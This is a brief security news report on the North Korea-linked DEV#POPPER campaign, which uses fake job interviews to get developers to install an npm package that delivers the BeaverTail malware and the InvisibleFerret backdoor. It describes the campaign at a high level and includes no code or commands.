“DEV#POPPER” Malware targets software developers
A new malware campaign, dubbed DEV#POPPER and linked to North Korea, is targeting software developers across Windows, Linux, and macOS systems.
This sophisticated attack exploits social engineering tactics to trick individuals into downloading malware disguised as software necessary for a job interview, with victims identified in South Korea, North America, Europe, and the Middle East.
Researchers from Securonix, Den Iuzvyk and Tim Peck, describe DEV#POPPER as an advanced form of manipulation aimed at extracting confidential information from unsuspecting targets. The campaign has been connected to artifacts that deliver an updated malware variant called BeaverTail, which can operate across platforms. The attack typically begins with perpetrators posing as interviewers who instruct candidates to download a ZIP file containing an npm module. This module runs obfuscated JavaScript that identifies the operating system and initiates communication with a remote server to exfiltrate valuable data.
The malware is also capable of downloading additional payloads, such as a Python backdoor known as InvisibleFerret, which can gather system metadata, access web browser cookies, execute commands, and log keystrokes. Recent updates to the malware include advanced obfuscation techniques and the incorporation of AnyDesk for persistence. The Python script further facilitates the theft of sensitive information from browsers like Google Chrome and Opera. This evolution of the DEV#POPPER campaign illustrates a significant increase in the capabilities of the attackers, focusing on multi-stage attacks to exfiltrate sensitive data.
